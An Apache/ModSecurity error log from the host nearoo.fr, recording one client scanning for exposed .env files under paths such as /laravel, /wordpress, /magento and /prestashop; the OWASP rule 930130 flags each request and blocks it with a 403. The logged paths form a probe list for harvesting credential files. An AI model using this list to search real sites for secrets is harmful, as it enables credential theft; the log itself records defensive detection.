[Mon May 11 17:36:04.562895 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/dev/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNiAAAAIE"]
[Mon May 11 17:36:04.563175 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/dev/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNiAAAAIE"]
[Mon May 11 17:36:04.563409 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/dev/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNiAAAAIE"]
[Mon May 11 17:36:04.756502 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/staging/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNigAAAIE"]
[Mon May 11 17:36:04.756701 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/staging/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNigAAAIE"]
[Mon May 11 17:36:04.756921 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/staging/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNigAAAIE"]
[Mon May 11 17:36:04.991520 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/opt/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNiwAAAIE"]
[Mon May 11 17:36:04.991772 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/opt/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNiwAAAIE"]
[Mon May 11 17:36:04.992065 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/opt/.env"] [unique_id "agH3ZPy_GXSWIKeli0sNiwAAAIE"]
[Mon May 11 17:36:05.337704 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/laravel/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjAAAAIE"]
[Mon May 11 17:36:05.337960 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/laravel/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjAAAAIE"]
[Mon May 11 17:36:05.338239 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/laravel/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjAAAAIE"]
[Mon May 11 17:36:05.504253 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/symfony/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjQAAAIE"]
[Mon May 11 17:36:05.504506 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/symfony/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjQAAAIE"]
[Mon May 11 17:36:05.504770 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/symfony/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjQAAAIE"]
[Mon May 11 17:36:05.619517 2026] [ssl:error] [pid 1411201:tid 1411250] (EAI 2)Name or service not known: [client 213.255.249.202:45571] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:05.619556 2026] [ssl:error] [pid 1411201:tid 1411250] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:05.752310 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/wordpress/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjgAAAIE"]
[Mon May 11 17:36:05.752571 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/wordpress/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjgAAAIE"]
[Mon May 11 17:36:05.752840 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/wordpress/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjgAAAIE"]
[Mon May 11 17:36:05.945313 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/wp/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjwAAAIE"]
[Mon May 11 17:36:05.945562 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/wp/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjwAAAIE"]
[Mon May 11 17:36:05.945834 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/wp/.env"] [unique_id "agH3Zfy_GXSWIKeli0sNjwAAAIE"]
[Mon May 11 17:36:06.157804 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cms/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkAAAAIE"]
[Mon May 11 17:36:06.158033 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cms/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkAAAAIE"]
[Mon May 11 17:36:06.158293 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cms/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkAAAAIE"]
[Mon May 11 17:36:06.448062 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/drupal/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkQAAAIE"]
[Mon May 11 17:36:06.448313 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/drupal/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkQAAAIE"]
[Mon May 11 17:36:06.448559 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/drupal/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkQAAAIE"]
[Mon May 11 17:36:06.654442 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/joomla/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkgAAAIE"]
[Mon May 11 17:36:06.654673 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/joomla/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkgAAAIE"]
[Mon May 11 17:36:06.654917 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/joomla/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkgAAAIE"]
[Mon May 11 17:36:06.824701 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/magento/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkwAAAIE"]
[Mon May 11 17:36:06.824933 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/magento/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkwAAAIE"]
[Mon May 11 17:36:06.825187 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/magento/.env"] [unique_id "agH3Zvy_GXSWIKeli0sNkwAAAIE"]
[Mon May 11 17:36:07.107135 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/shopify/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNlQAAAIE"]
[Mon May 11 17:36:07.107382 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/shopify/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNlQAAAIE"]
[Mon May 11 17:36:07.107635 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/shopify/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNlQAAAIE"]
[Mon May 11 17:36:07.311102 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/prestashop/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNlgAAAIE"]
[Mon May 11 17:36:07.311353 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/prestashop/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNlgAAAIE"]
[Mon May 11 17:36:07.311606 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/prestashop/.env"] [unique_id "agH3Z_y_GXSWIKeli0sNlgAAAIE"]
